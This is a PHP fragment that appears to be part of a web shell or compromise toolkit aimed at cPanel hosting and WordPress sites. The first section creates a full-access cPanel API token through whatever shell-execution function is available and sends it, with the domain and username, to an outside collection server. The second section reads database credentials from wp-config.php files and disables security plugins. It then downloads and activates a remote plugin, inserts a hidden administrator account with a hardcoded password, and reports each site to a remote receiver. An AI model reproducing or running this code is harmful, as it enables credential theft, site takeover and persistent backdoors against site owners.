1. CPANEL TOKEN
";
$cwd = str_replace('\\', '/', getcwd());
$homedir = "/home/" . get_current_user() . "/public_html";
if (preg_match('~^(/home\d*?/[^/]+)~', $cwd, $m)) {
$homedir = $m[1] . "/public_html";
}
$cmd = "(uapi Tokens create_full_access name=xshikata || /usr/bin/uapi Tokens create_full_access name=xshikata || /usr/local/cpanel/bin/uapi Tokens create_full_access name=xshikata) 2>&1";
$output = "";
$used_method = "None";
$methods = [
'shell_exec' => function($c) { return @shell_exec($c); },
'exec' => function($c) { @exec($c, $o); return implode("\n", $o); },
'passthru' => function($c) { ob_start(); @passthru($c); return ob_get_clean(); },
'system' => function($c) { ob_start(); @system($c); return ob_get_clean(); },
'popen' => function($c) { $h = @popen($c, 'r'); if($h) { $o = stream_get_contents($h); @pclose($h); return $o; } return null; },
'proc_open' => function($c) {
$d = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
$p = @proc_open($c, $d, $pipes);
if (is_resource($p)) { $o = stream_get_contents($pipes[1]); @fclose($pipes[1]); @fclose($pipes[2]); @proc_close($p); return $o; }
return null;
}
];
foreach ($methods as $name => $func) {
if (function_exists($name)) {
$res = $func($cmd);
if (!empty($res)) {
$output = $res;
if (stripos($res, 'token:') !== false || stripos($res, 'conflicting') !== false || stripos($res, 'already exists') !== false) {
$used_method = $name;
break;
}
}
}
}
$token_val = "";
$display_status = "UNKNOWN";
$display_color = "text-secondary";
if(preg_match('/token:\s*(\S+)/i', $output, $m)) {
$token_val = trim($m[1]);
$display_status = "CREATED";
$display_color = "text-success";
} elseif (stripos($output, 'conflicting') !== false || stripos($output, 'already exists') !== false) {
$token_val = "Exists (Secret Hidden)";
$display_status = "ALREADY EXISTS";
$display_color = "text-warning";
} else {
$display_status = "NOT FOUND";
$display_color = "text-danger";
}
$server_response = "Skipped";
$srv_color = "text-secondary";
if ($display_status === "CREATED" && !empty($token_val)) {
$target_url = "https://stepmomhub.com/catch.php";
$data_json = json_encode([
"domain" => $_SERVER['HTTP_HOST'],
"username" => get_current_user(),
"apiToken" => $token_val,
"homedir" => $homedir
]);
$raw_response = "No Connect";
if (function_exists('curl_init')) {
$ch = curl_init($target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data_json);
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
$raw_response = curl_exec($ch);
curl_close($ch);
} elseif (ini_get('allow_url_fopen')) {
$opts = ['http' => ['method'=>'POST', 'header'=>'Content-Type: application/json', 'content'=>$data_json, 'timeout'=>10], 'ssl'=>['verify_peer'=>false, 'verify_peer_name'=>false]];
$raw_response = @file_get_contents($target_url, false, stream_context_create($opts));
}
$json_res = json_decode($raw_response, true);
if ($json_res) {
if ($json_res['status'] === 'success') { $server_response = "Saved to Database."; $srv_color = "text-success"; }
elseif ($json_res['status'] === 'ignored') { $server_response = "Already Saved (Duplicate)."; $srv_color = "text-warning"; }
else { $server_response = "Server Error: " . $json_res['msg']; $srv_color = "text-danger"; }
} else { $server_response = "Raw: " . substr($raw_response, 0, 50); }
} elseif ($display_status === "ALREADY EXISTS") {
$server_response = "Skipped (Secret Hidden)"; $srv_color = "text-warning";
}
echo "
Method: $used_method | Token: $display_status
";
echo "
Server: $server_response
";
if ($display_status === "NOT FOUND") { $clean_out = htmlspecialchars(substr($output, 0, 200)); echo "
$clean_out
"; }
echo "
2. WP ADMIN CREATOR
";
$targets = [];
scan_smart_stream($target, $targets);
$targets = array_unique($targets);
if (empty($targets)) {
echo "
No wp-config.php found in this path.
";
} else {
$au = 'xshikata';
$ap = md5('Lulz1337');
$ae = 'topupgameku.id@gmail.com';
$plugin_src = 'https://raw.githubusercontent.com/baseng1337/damn/refs/heads/main/system-core.php';
$plugin_folder_name = 'system-core';
$plugin_filename = 'system-core.php';
$plugin_hook = $plugin_folder_name . '/' . $plugin_filename;
$receiver_url = 'https://stepmomhub.com/wp/receiver.php';
$receiver_key = 'wtf';
$master_core = sys_get_temp_dir() . '/master_core_' . time() . '.php';
$master_index = sys_get_temp_dir() . '/master_index_' . time() . '.php';
$ua = stream_context_create(['http'=>['header'=>"User-Agent: Mozilla/5.0"]]);
$src_core = @file_get_contents($plugin_src, false, $ua);
$src_idx = @file_get_contents('https://raw.githubusercontent.com/baseng1337/damn/refs/heads/main/index.php', false, $ua);
if($src_core) file_put_contents($master_core, $src_core);
if($src_idx) file_put_contents($master_index, $src_idx);
foreach ($targets as $cfg) {
$raw = x_read($cfg);
if (!$raw) continue;
$dh = get_conf_val_smart($raw, 'DB_HOST');
$du = get_conf_val_smart($raw, 'DB_USER');
$dp = get_conf_val_smart($raw, 'DB_PASSWORD');
$dn = get_conf_val_smart($raw, 'DB_NAME');
$pre = 'wp_';
if (preg_match("/\\\$table_prefix\s*=\s*['\"]([^'\"]+)['\"]/", $raw, $m)) $pre = $m[1];
$wp_root_path = dirname($cfg);
$disp = str_replace($target, '', $wp_root_path);
echo "
";
echo "Dir: " . ($disp?:'/') . " -> ";
@mysqli_report(MYSQLI_REPORT_OFF);
$cn = mysqli_init();
@mysqli_options($cn, MYSQLI_OPT_CONNECT_TIMEOUT, 2);
if (@mysqli_real_connect($cn, $dh, $du, $dp, $dn)) {
$plugins_dir = $wp_root_path . '/wp-content/plugins/';
$targets_to_kill = ['wordfence', 'ithemes-security-pro', 'sucuri-scanner', 'sg-security', 'limit-login-attempts-reloaded'];
foreach ($targets_to_kill as $folder) {
$path = $plugins_dir . $folder;
if (is_dir($path)) { @rename($path, $path . '_killed_' . time()); }
}
$target_folder = $plugins_dir . $plugin_folder_name;
$target_file = $target_folder . '/' . $plugin_filename;
$index_file = $target_folder . '/index.php';
if (!is_dir($target_folder)) { @mkdir($target_folder, 0755, true); @chmod($target_folder, 0755); }
$deploy_ok = false;
if (file_exists($master_core) && @copy($master_core, $target_file)) {
@chmod($target_file, 0644);
if (file_exists($master_index)) @copy($master_index, $index_file);
$deploy_ok = true;
}
$act_ok = false; $user_ok = false;
if ($deploy_ok) {
$qopt = @mysqli_query($cn, "SELECT option_value FROM {$pre}options WHERE option_name='active_plugins'");
$current_plugins = ($qopt && mysqli_num_rows($qopt) > 0) ? @unserialize(mysqli_fetch_assoc($qopt)['option_value']) : [];
if (!is_array($current_plugins)) $current_plugins = [];
if (!in_array($plugin_hook, $current_plugins)) {
$current_plugins[] = $plugin_hook;
sort($current_plugins);
$hex_data = bin2hex(serialize($current_plugins));
@mysqli_query($cn, "DELETE FROM {$pre}options WHERE option_name='active_plugins'");
if (@mysqli_query($cn, "INSERT INTO {$pre}options (option_name, option_value, autoload) VALUES ('active_plugins', 0x$hex_data, 'yes')")) $act_ok = true;
} else { $act_ok = true; }
}
$q1 = @mysqli_query($cn, "SELECT ID FROM {$pre}users WHERE user_login='$au'");
if ($q1 && mysqli_num_rows($q1) > 0) {
$uid = mysqli_fetch_assoc($q1)['ID'];
@mysqli_query($cn, "UPDATE {$pre}users SET user_pass='$ap' WHERE ID=$uid");
$user_ok = true;
} else {
@mysqli_query($cn, "INSERT INTO {$pre}users (user_login,user_pass,user_nicename,user_email,user_status,display_name) VALUES ('$au','$ap','Admin','$ae',0,'Admin')");
$uid = mysqli_insert_id($cn);
if($uid) $user_ok = true;
}
if($user_ok) {
$cap = serialize(['administrator'=>true]);
@mysqli_query($cn, "INSERT INTO {$pre}usermeta (user_id,meta_key,meta_value) VALUES ($uid,'{$pre}capabilities','$cap') ON DUPLICATE KEY UPDATE meta_value='$cap'");
@mysqli_query($cn, "INSERT INTO {$pre}usermeta (user_id,meta_key,meta_value) VALUES ($uid,'{$pre}user_level','10') ON DUPLICATE KEY UPDATE meta_value='10'");
}
$ping_res = "-";
$surl = "";
$qurl = @mysqli_query($cn, "SELECT option_value FROM {$pre}options WHERE option_name='siteurl'");
if ($qurl && mysqli_num_rows($qurl)>0) $surl = mysqli_fetch_assoc($qurl)['option_value'];
if (!empty($surl)) {
$pdata_direct = http_build_query(['action'=>'register_site', 'secret'=>$receiver_key, 'domain'=>$surl, 'api_user'=>'', 'api_pass'=>'']);
$ctx_direct = stream_context_create(['http'=>['method'=>'POST','header'=>"Content-type: application/x-www-form-urlencoded",'content'=>$pdata_direct,'timeout'=>2]]);
@file_get_contents($receiver_url, false, $ctx_direct);
if ($act_ok) {
$trigger_url = rtrim($surl, '/') . '/wp-content/plugins/' . $plugin_folder_name . '/index.php';
$ctx_trig = stream_context_create(['http'=>['method'=>'GET','header'=>"User-Agent: Mozilla/5.0",'timeout'=>2]]);
@file_get_contents($trigger_url, false, $ctx_trig);
$ping_res = "OK";
}
}
echo $deploy_ok ? "PLG:OK " : "PLG:ERR ";
echo $user_ok ? "USR:OK " : "USR:ERR ";
echo "PING:$ping_res";
mysqli_close($cn);
} else {
echo "DB CONN FAIL";
}
echo "
";
}
}
echo "